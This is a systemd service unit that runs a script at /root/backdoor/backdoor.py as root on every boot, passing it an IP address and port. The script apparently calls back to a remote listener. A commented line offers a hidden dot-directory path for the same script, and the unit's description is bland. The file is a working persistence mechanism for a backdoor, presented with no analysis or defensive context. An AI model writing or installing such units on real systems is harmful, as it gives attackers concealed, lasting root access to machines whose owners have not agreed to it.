[Unit]
Description=Run Python Script after Reboot
After=network.target

[Service]
Type=simple
ExecStart=/root/backdoor/backdoor.py 192.168.64.8 8887
#ExecStart=/root/.tmp/.test.py 192.168.64.8 8887
User=root
Group=root

[Install]
WantedBy=multi-user.target
